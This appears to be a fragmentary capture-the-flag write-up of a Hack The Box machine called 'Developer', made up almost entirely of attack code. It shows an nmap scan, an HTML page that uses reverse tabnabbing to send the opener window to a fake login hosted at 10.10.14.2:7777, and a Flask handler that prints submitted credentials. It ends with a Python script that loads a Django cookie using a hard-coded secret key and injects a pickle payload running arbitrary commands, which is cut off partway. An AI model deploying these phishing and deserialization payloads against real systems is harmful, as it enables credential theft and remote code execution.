$ nmap -sC -sV 10.10.11.103 Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-18 12:53 CST Nmap scan report for 10.10.11.103 Host is up (0.21s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 36:aa:93:e4:a4:56:ab:39:86:66:bf:3e:09:fa:eb:e0 (RSA) | 256 11:fb:e9:89:2e:4b:66:40:7b:6b:01:cf:f2:f2:ee:ef (ECDSA) |_ 256 77:56:93:6e:5f:ea:e2:ad:b0:2e:cf:23:9d:66:ed:12 (ED25519) 80/tcp open http Apache httpd 2.4.41 |_http-title: Did not follow redirect to http://developer.htb/ |_http-server-header: Apache/2.4.41 (Ubuntu) Service Info: Host: developer.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 75.56 seconds
<html> <body> <h2>Challenge Writeup</h2> <p>This challenge was quite well designed! Good job by the developers at Developer for this one. I would definitely recommend it to my friends. It required critical thinking and tools like Ghidra to get the job done</p> <script> if (window.opener) window.opener.parent.location.replace('http://10.10.14.2:7777/accounts/login/'); if (window.parent != window) window.parent.location.replace('https://10.10.14.2:7777/accounts/login/'); </script> </body> </html>
if request.method == 'POST': print('\n'.join([f'{x[0]}: {x[1]}'for x in request.form.items()])) return redirect("http://10.10.11.103/accounts/login/", code=302) else: return render_template('loginform.html')
if __name__ == "__main__": app.run(host="0.0.0.0", port=7777)
#!/usr/bin/python2 import django.core.signing, django.contrib.sessions.serializers from django.http import HttpResponse import cPickle import os import requests import sys
cmd = sys.argv[1]
SECRET_KEY='c7f3a64aa184b7cbb1a7cbe9cd544913' #Initial cookie I had on sentry when trying to reset a password cookie=".eJxrYKotZNQI5UxMLsksS80vSi9kimBjYGAoTs0rKaosZA5lKS5NyY_gAQqVGuS55IZFFIeUGTpHcAEFSlKLS5Lz87MzU8FayvOLslNTQnnjE0tLMuJLi1OL4jNTvFlDhZAEkhKTs1PzUkKVIObrlZZk5hTrgeT1XHMTM3McgSwniJpSPQDm9TPf:1n9hcy:HpZvM4Joi_Uu5WcsvPd9o2xXrUY" newContent = django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies') classPickleRce(object): def__reduce__(self): return (os.system,(cmd,)) newContent['testcookie'] = PickleRce()